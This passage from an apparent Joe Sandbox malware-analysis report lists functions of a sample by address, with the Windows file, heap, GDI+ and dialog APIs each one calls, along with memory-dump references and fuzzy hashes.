                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$BuffersFlushTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1392018926-0
                                                                                                  • Opcode ID: 14a2372e9ebfdbc8eb2fa67aefdec93c2c76a8c1ff341e6277b363d49fef6868
                                                                                                  • Instruction ID: 4485c032a824d5342afd87a46b5f56659c4bae1b6fc56e3d3d4c62f75ecd328c
                                                                                                  • Opcode Fuzzy Hash: 14a2372e9ebfdbc8eb2fa67aefdec93c2c76a8c1ff341e6277b363d49fef6868
                                                                                                  • Instruction Fuzzy Hash: A621E131288246AFC714DF74C891AABBBE8AF95304F08491DF4D5871C2D329ED4DDB61
                                                                                                  Function 0090966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00909F27,?,?,0090771A), ref: 009096E6
                                                                                                  • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00909F27,?,?,0090771A), ref: 00909716
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: dd721efb4bd81bc5253d28e41d347ff1761a7673096452add25a94a4b6a1a29f
                                                                                                  • Instruction ID: 6b769e95a0b87f48a076a58071712e38256f6c00553527d4c79cb248a56efff5
                                                                                                  • Opcode Fuzzy Hash: dd721efb4bd81bc5253d28e41d347ff1761a7673096452add25a94a4b6a1a29f
                                                                                                  • Instruction Fuzzy Hash: E821F5B15043446FE3308A69CC89FF777DCEB49324F004A19F9D6C25D2C779A8849A71
                                                                                                  Function 00909E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00909EC7
                                                                                                  • GetLastError.KERNEL32 ref: 00909ED4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 2976181284-0
                                                                                                  • Opcode ID: 2fc23d6ef95b42f807c9d907d38acf467da8df714286f8c6598e09cbb4661d57
                                                                                                  • Instruction ID: eacd9e9ab095b0a8f840b76237ee25fe1081dd5b401361e105e0eae323e3e278
                                                                                                  • Opcode Fuzzy Hash: 2fc23d6ef95b42f807c9d907d38acf467da8df714286f8c6598e09cbb4661d57
                                                                                                  • Instruction Fuzzy Hash: 8111E130640700AFE734C628CC84BA6B7EDAB45360F604A2AE163D26D1E774ED89CB60
                                                                                                  Function 00928E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 00928E75
                                                                                                    • Part of subcall function 00928E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0092CA2C,00000000,?,00926CBE,?,00000008,?,009291E0,?,?,?), ref: 00928E38
                                                                                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00941098,009017CE,?,?,00000007,?,?,?,009013D6,?,00000000), ref: 00928EB1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocAllocate_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2447670028-0
                                                                                                  • Opcode ID: 751e1e00e39e1fb80916e89756cebde331990c45a998418d24508de7f403b554
                                                                                                  • Instruction ID: ce7514b6df52978b7828ff53b09e1f48f8106cc7c31b8b0371f2ea38e843619c
                                                                                                  • Opcode Fuzzy Hash: 751e1e00e39e1fb80916e89756cebde331990c45a998418d24508de7f403b554
                                                                                                  • Instruction Fuzzy Hash: 64F0F63260713166DB213B26BC05B6F375C8FC1B70F264526F814AA1A9DF70DD0191E0
                                                                                                  Function 0091109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 009110AB
                                                                                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 009110B2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                                  • String ID:
                                                                                                  • API String ID: 1231390398-0
                                                                                                  • Opcode ID: ccf9d78954481a4096e01cbdc8f6cd4a17fee5066f60d3e07e2bb4f9c2eeca24
                                                                                                  • Instruction ID: 86ba81bb0eba73e4594b49eb42676bd0bb1918ac6510f59419b7051cd8165cb2
                                                                                                  • Opcode Fuzzy Hash: ccf9d78954481a4096e01cbdc8f6cd4a17fee5066f60d3e07e2bb4f9c2eeca24
                                                                                                  • Instruction Fuzzy Hash: D6E0DF36F1014DB7CF0D8BB49C059EB73EDEA4820432081B9E613E7101F934EEC14AA0
                                                                                                  Function 0090A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A501
                                                                                                    • Part of subcall function 0090BB03: _wcslen.LIBCMT ref: 0090BB27
                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A532
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile$_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2673547680-0
                                                                                                  • Opcode ID: 8b7bfb40ca293676ae48babc191f526effbd5528e82b7a1f84ba498749f01c5c
                                                                                                  • Instruction ID: c833e29d6390b6e4064ef21946aed6eec49c056984849c008ce125f7e0340a61
                                                                                                  • Opcode Fuzzy Hash: 8b7bfb40ca293676ae48babc191f526effbd5528e82b7a1f84ba498749f01c5c
                                                                                                  • Instruction Fuzzy Hash: 9FF0393225420DBBEF015F60DC45FDE37ACBF04386F488061B949D61A0DB71DAD8EA90
                                                                                                  Function 0090A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DeleteFileW.KERNELBASE(000000FF,?,?,0090977F,?,?,009095CF,?,?,?,?,?,00932641,000000FF), ref: 0090A1F1
                                                                                                    • Part of subcall function 0090BB03: _wcslen.LIBCMT ref: 0090BB27
                                                                                                  • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0090977F,?,?,009095CF,?,?,?,?,?,00932641), ref: 0090A21F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DeleteFile$_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2643169976-0
                                                                                                  • Opcode ID: 063afbeae26b2573486eb9febe47d19a8b7e1d0996609ef4f3167cb26d3b8649
                                                                                                  • Instruction ID: d0d3ef622fbc4b4f0b827caf119980e84e0f88b844bcd0632dab81dbbf071fc5
                                                                                                  • Opcode Fuzzy Hash: 063afbeae26b2573486eb9febe47d19a8b7e1d0996609ef4f3167cb26d3b8649
                                                                                                  • Instruction Fuzzy Hash: 92E092312502097BDB015F65DC45FD9379CAF083C2F484021B944D2090EB61DEC4EB90
                                                                                                  Function 0091AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00932641,000000FF), ref: 0091ACB0
                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,00932641,000000FF), ref: 0091ACB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GdiplusShutdownUninitialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 3856339756-0
                                                                                                  • Opcode ID: b95db6fd3edcf3dbce15798517c2447f72ecd3a3ad967b51ee3be42652c27e53
                                                                                                  • Instruction ID: 48c457bfb195cbe4a8e0272a1b10a5364694008578189fe843e2c0e58e963206
                                                                                                  • Opcode Fuzzy Hash: b95db6fd3edcf3dbce15798517c2447f72ecd3a3ad967b51ee3be42652c27e53
                                                                                                  • Instruction Fuzzy Hash: 68E06D72648650EFCB019B59DC06B4AFBA8FB89F20F00426AF416D37A0CB74A840CA90
                                                                                                  Function 0090A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,0090A23A,?,0090755C,?,?,?,?), ref: 0090A254
                                                                                                    • Part of subcall function 0090BB03: _wcslen.LIBCMT ref: 0090BB27
                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0090A23A,?,0090755C,?,?,?,?), ref: 0090A280
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile$_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2673547680-0
                                                                                                  • Opcode ID: 028abb8512ef94283f3dfe679381346ddf12f296c0d857525aee4352e9091062
                                                                                                  • Instruction ID: 230a8abc791ede15263018b5459445fb5dc8deb34fadbeb66a3b59bb883859e9
                                                                                                  • Opcode Fuzzy Hash: 028abb8512ef94283f3dfe679381346ddf12f296c0d857525aee4352e9091062
                                                                                                  • Instruction Fuzzy Hash: FAE092325041285BDB10AB68CC05BD9779CAB083E1F044271FD54E31D0D770DE84CAE0
                                                                                                  Function 0091DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _swprintf.LIBCMT ref: 0091DEEC
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                  • SetDlgItemTextW.USER32(00000065,?), ref: 0091DF03
                                                                                                    • Part of subcall function 0091B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0091B579
                                                                                                    • Part of subcall function 0091B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091B58A
                                                                                                    • Part of subcall function 0091B568: IsDialogMessageW.USER32(00010464,?), ref: 0091B59E
                                                                                                    • Part of subcall function 0091B568: TranslateMessage.USER32(?), ref: 0091B5AC
                                                                                                    • Part of subcall function 0091B568: DispatchMessageW.USER32(?), ref: 0091B5B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 2718869927-0
                                                                                                  • Opcode ID: b6677fa6c20f84a2b4b095ba9397beecd17a35cff889c8888a295d17b0fe5051
                                                                                                  • Instruction ID: eb6076c32ab6551c8be50bf1128b4055d59a7c2855266b322335d656fc5f2145
                                                                                                  • Opcode Fuzzy Hash: b6677fa6c20f84a2b4b095ba9397beecd17a35cff889c8888a295d17b0fe5051
                                                                                                  • Instruction Fuzzy Hash: 7AE092B65182482ADF02AB60DC06FDF3BAC5B06785F440891F740EA0F3DA79EA509661
                                                                                                  Function 0091081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00910836
                                                                                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0090F2D8,Crypt32.dll,00000000,0090F35C,?,?,0090F33E,?,?,?), ref: 00910858
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryLibraryLoadSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1175261203-0
                                                                                                  • Opcode ID: b333d9c13467adab73e609a15c5f529f5ee7e79bac7fc605ffe1f4c16d105cc2
                                                                                                  • Instruction ID: 938ddd5b6ae8161ce82dadf7eab2ee243f99e538243de07d2b07f5f9f1f824cf
                                                                                                  • Opcode Fuzzy Hash: b333d9c13467adab73e609a15c5f529f5ee7e79bac7fc605ffe1f4c16d105cc2
                                                                                                  • Instruction Fuzzy Hash: C8E0487691411C6BDB11A794DC45FDA77ACEF493D1F0440657645D2044D674DAC4CFF0
                                                                                                  Function 0091A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0091A3DA
                                                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0091A3E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BitmapCreateFromGdipStream
                                                                                                  • String ID:
                                                                                                  • API String ID: 1918208029-0
                                                                                                  • Opcode ID: d26eae645bc8200d63f57a30b399689b257c8d9f0c9231e97ab5564a352d375c
                                                                                                  • Instruction ID: 95f51f2da24f31108c72b3160a2a741b6e424adcbb3ddc97b1f161cce79309a3
                                                                                                  • Opcode Fuzzy Hash: d26eae645bc8200d63f57a30b399689b257c8d9f0c9231e97ab5564a352d375c
                                                                                                  • Instruction Fuzzy Hash: 6BE0ED7160521CEBCB10DF56D5417DDBBE8EB04360F10845AA85693201E374AE44DB91
                                                                                                  Function 00922B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00922BAA
                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00922BB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                  • String ID:
                                                                                                  • API String ID: 1660781231-0
                                                                                                  • Opcode ID: 54c6714f51dad17ac1d423e0183ea389a8ad696e46726cbca667bb5efb2052da
                                                                                                  • Instruction ID: fc56b8a6b340dc4bf5129192a951f9d7e8c23c09b8ecc56e216aa1981d636755
                                                                                                  • Opcode Fuzzy Hash: 54c6714f51dad17ac1d423e0183ea389a8ad696e46726cbca667bb5efb2052da
                                                                                                  • Instruction Fuzzy Hash: 72D022345A8330384C247F7039077493349AEC3B797A086BAFC20958CDEE188040A011
                                                                                                  Function 009012F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemShowWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 3351165006-0
                                                                                                  • Opcode ID: d28457f1ce0bfb035789a000c4541859f3372677a191ba4b14a8c9f730e17aea
                                                                                                  • Instruction ID: 890ed3abb802501d46daf9f6d8548b0817fc2414174ebfe3692c8e0123f5a846
                                                                                                  • Opcode Fuzzy Hash: d28457f1ce0bfb035789a000c4541859f3372677a191ba4b14a8c9f730e17aea
                                                                                                  • Instruction Fuzzy Hash: 53C0123246C200BECB010BB4DD09C2BBBA8ABA7312F06C90CF0A5C0060C238C110EB11
                                                                                                  Function 00901A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
